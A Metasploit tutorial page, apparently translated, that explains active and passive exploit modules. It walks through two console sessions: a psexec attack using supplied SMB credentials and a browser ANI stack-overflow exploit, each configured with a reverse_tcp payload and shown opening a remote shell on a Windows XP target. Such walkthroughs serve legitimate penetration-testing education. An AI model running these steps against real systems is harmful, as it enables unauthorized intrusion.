Exploit Types in Metasploit Framework

Within the Metasploit Framework, all exploit modules are grouped as active and passive.
By İbrahim Korucuoğlu ( @siberoloji) |
Tags:
Categories:

Within the Metasploit Framework, all exploit modules are grouped as active and passive.

Active Exploit

Active exploits will run on a specific target and continue to run until the process is completed. They stop running when they encounter any error.

For example, the Brute-force module runs until a shell command line is opened on the target computer and stops when it is finished. Since their processes can take a long time to complete, they can be sent to the background using the -j parameter.

In the example below, you can see that the ms08_067_netapi exploit is started and sent to the background.

msf exploit**(**ms08_067_netapi**)** > exploit -j
> Exploit running as background job.
msf exploit**(**ms08_067_netapi**)** >

Active Exploit Example

In this example, a target computer (192.168.1.100) whose information was obtained through prior discovery is shown setting the necessary variables and starting to work. The psexec exploit and the reverse_tcp payload module are used to open a shell on the target computer.

msf > use exploit/windows/smb/psexec
msf exploit**(**psexec**)** > set RHOST 192.168.1.100
RHOST **=>** 192.168.1.100
msf exploit**(**psexec**)** > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD **=>** windows/shell/reverse_tcp
msf exploit**(**psexec**)** > set LHOST 192.168.1.5
LHOST **=>** 192.168.1.5
msf exploit**(**psexec**)** > set LPORT 4444
LPORT **=>** 4444
msf exploit**(**psexec**)** > set SMBUSER victim
SMBUSER **=>** victim
msf exploit**(**psexec**)** > set SMBPASS s3cr3t
SMBPASS **=>** s3cr3t
msf exploit**(**psexec**)** > exploit

> Connecting to the server...
> Started reverse handler
> Authenticating as user 'victim'...
> Uploading payload...
> Created \hikmEeEM.exe...
> Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
> Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
> Obtaining a service manager handle...
> Creating a new service **(**ciWyCVEp - "MXAVZsCqfRtZwScLdexnD"**)**...
> Closing service handle...
> Opening service...
> Starting the service...
>Removing the service...
> Closing service handle...
> Deleting \hikmEeEM.exe...
> Sending stage **(**240 bytes**)**
> Command shell session 1 opened **(**192.168.1.5:4444 -> 192.168.1.100:1073**)**

Microsoft Windows XP **[**Version 5.1.2600]
**(**C**)** Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Passive Exploit

Passive Exploits run passively on the local computer (our own computer) and remain listening. They wait for the target computer to somehow connect to the local computer.

Passive exploits almost always focus on clients such as Web browsers, FTP, etc. They can also be used in connections from files sent via e-mail. When a passive exploit runs, it starts waiting. When a user clicks on a link on the site or performs an action, that’s when the passive exploit in the listening receives the signal and opens a shell on the target.

You can see the list of exploits running in the background and listening by giving the -l parameter to the sessions command. You can use the -i parameter to go to the desired ID numbered process from the list.

msf exploit**(**ani_loadimage_chunksize**)** > sessions -l

Active sessions
**================**

Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.1.5:52647 -> 192.168.1.100:4444

msf exploit**(**ani_loadimage_chunksize**)** > sessions -i 1
> Starting interaction with 1...

meterpreter >

Passive Exploit Example

In the example below, a user is expected to enter a Web page using the loadimage_chunksize exploit and reverse_tcp payload. The LHOST variable indicates the IP address of the computer that will listen locally, and the LPORT indicates the port number that will listen on the local computer.

msf > use exploit/windows/browser/ani_loadimage_chunksize
msf exploit**(**ani_loadimage_chunksize**)** > set URIPATH /
URIPATH **=>** /
msf exploit**(**ani_loadimage_chunksize**)** > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD **=>** windows/shell/reverse_tcp
msf exploit**(**ani_loadimage_chunksize**)** > set LHOST 192.168.1.5
LHOST **=>** 192.168.1.5
msf exploit**(**ani_loadimage_chunksize**)** > set LPORT 4444
LPORT **=>** 4444
msf exploit**(**ani_loadimage_chunksize**)** > exploit
> Exploit running as background job.

> Started reverse handler
> Using URL: <a href="http://0.0.0.0:8080/">http://0.0.0.0:8080/</a>
> Local IP: <a href="http://192.168.1.5:8080/">http://192.168.1.5:8080/</a>
> Server started.
msf exploit**(**ani_loadimage_chunksize**)** >
> Attempting to exploit ani_loadimage_chunksize
> Sending HTML page to 192.168.1.100:1077...
> Attempting to exploit ani_loadimage_chunksize
> Sending Windows ANI LoadAniIcon**()** Chunk Size Stack Overflow **(**HTTP**)** to 192.168.1.100:1077...
> Sending stage **(**240 bytes**)**
> Command shell session 2 opened **(**192.168.1.5:4444 -> 192.168.1.100:1078**)**

msf exploit**(**ani_loadimage_chunksize**)** > sessions -i 2
> Starting interaction with 2...

Microsoft Windows XP **[**Version 5.1.2600]
**(**C**)** Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\victim\Desktop>

You can send us other topics you want to be explained.

Video Anlatım

Last modified 09.01.2025: msfconsoel translations ongoing... (f7e18da)